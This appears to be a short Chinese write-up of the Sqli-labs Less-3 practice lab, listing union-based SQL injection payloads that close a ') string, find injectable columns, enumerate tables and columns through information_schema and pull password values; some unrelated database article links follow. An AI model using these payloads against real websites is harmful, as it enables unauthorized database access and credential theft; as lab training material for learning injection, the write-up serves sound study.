Sqli-labs 3

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
古月居GYH3 小时前
【数据分析】如何在PyCharm中高效配置和使用SQL
ide·sql·pycharm
计算机毕设定制辅导-无忧学长7 小时前
西门子 PLC 与 Modbus 集成:S7-1500 RTU/TCP 配置指南(一)
服务器·数据库·tcp/ip
程序员柳8 小时前
基于微信小程序的校园二手交易平台、微信小程序校园二手商城源代码+数据库+使用说明,layui+微信小程序+Spring Boot
数据库·微信小程序·layui
梦在深巷、8 小时前
MySQL/MariaDB数据库主从复制之基于二进制日志的方式
linux·数据库·mysql·mariadb
IT乌鸦坐飞机8 小时前
ansible部署数据库服务随机启动并创建用户和设置用户有完全权限
数据库·ansible·centos7
IT_10248 小时前
Spring Boot项目开发实战销售管理系统——数据库设计!
java·开发语言·数据库·spring boot·后端·oracle
祁思妙想10 小时前
八股学习(三)---MySQL
数据库·学习·mysql
惊骇世俗王某人10 小时前
1.MySQL之如何定位慢查询
数据库·mysql
程序员张310 小时前
SQL分析与打印-p6spy组件
spring boot·sql·mybatis·mybatisplus·p6spy
秦歌66611 小时前
向量数据库-Milvus快速入门
数据库·milvus